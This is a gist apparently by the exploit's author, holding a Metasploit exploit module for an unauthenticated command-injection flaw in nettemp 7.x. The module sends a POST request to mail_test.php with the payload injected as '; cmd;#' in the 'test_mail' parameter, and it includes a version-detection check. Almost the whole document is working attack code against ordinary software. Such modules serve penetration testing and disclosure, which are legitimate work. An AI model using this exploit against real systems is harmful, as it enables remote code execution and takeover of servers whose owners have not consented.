@bcoles
Created October 13, 2013 16:01
This module exploits a command execution vulnerability in nettemp version 7.x which could be abused to allow unauthenticated users to execute arbitrary commands under the context of the web server user. The 'mail_test.php' file calls 'exec()' with user controlled data from the 'test_mail' parameter.
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Nettemp Command Execution",
      'Description'    => %q{
        This module exploits a command execution vulnerability in nettemp
        version 7.x which could be abused to allow unauthenticated users to
        execute arbitrary commands under the context of the web server user.
        The 'mail_test.php' file calls 'exec()' with user controlled data
        from the 'test_mail' parameter.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Brendan Coles <bcoles[at]gmail.com>', # Discovery and exploit
        ],
      'References'     =>
        [
          ['URL', 'https://github.com/sosprz/nettemp/pull/6'],
          ['URL', 'https://github.com/sosprz/nettemp/pull/7'],
          ['URL', 'https://github.com/sosprz/nettemp/pull/8']
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00\x0a\x0d"
        },
      'Platform'       => %w{ win linux unix },
      'Compat'         =>
        {
          'PayloadType' => 'cmd',
          'RequiredCmd' => 'generic python perl ruby telnet bash',
        },
      'Targets'        =>
        [['Automatic Targeting', { 'auto' => true }]],
      'Privileged'     => false,
      'Arch'           => ARCH_CMD,
      'DisclosureDate' => 'Oct 14 2013',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to nettemp', '/nettemp/'])
      ], self.class)
  end

  #
  # Execute a command
  #
  def http_send_command(cmd, opts={})
    res = send_request_cgi({
      'uri'       => normalize_uri(target_uri.path, 'modules/mail/html/mail_test.php'),
      'method'    => 'POST',
      'vars_post' => {
        'mail_test1' => 'mail_test2',
        'test_mail'  => "; #{cmd};#"
      }
    })
    return res
  end

  #
  # Wrap command execution
  #
  def execute_command(cmd, opts = {})
    vprint_status("#{peer} - Attempting to execute: '#{cmd}'")
    http_send_command(cmd)
  end

  #
  # Check for nettemp version 7.x
  #
  def check
    print_status("#{peer} - Checking vulnerability")
    res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path) })
    if not res
      print_error("#{peer} - Connection timed out")
      return Exploit::CheckCode::Unknown
    elsif res.body =~ /www\.nettemp\.pl v([\d\.]+)/
      version = $1
      print_good("#{peer} - Found version: #{version}")
      if version =~ /^7/
        return Exploit::CheckCode::Detected
      end
    else
      vprint_error("#{peer} - Could not detect nettemp")
      return Exploit::CheckCode::Safe
    end
    Exploit::CheckCode::Unknown
  end

  #
  # Exploit
  #
  def exploit
    print_status("#{peer} - Sending payload (#{payload.encoded.length} bytes)")
    res = execute_command("#{payload.encoded}")
    if res
      print_good("#{peer} - Payload sent successfully")
    else
      fail_with(Exploit::Failure::Unknown, "#{peer} - Sending payload failed")
    end
  end
end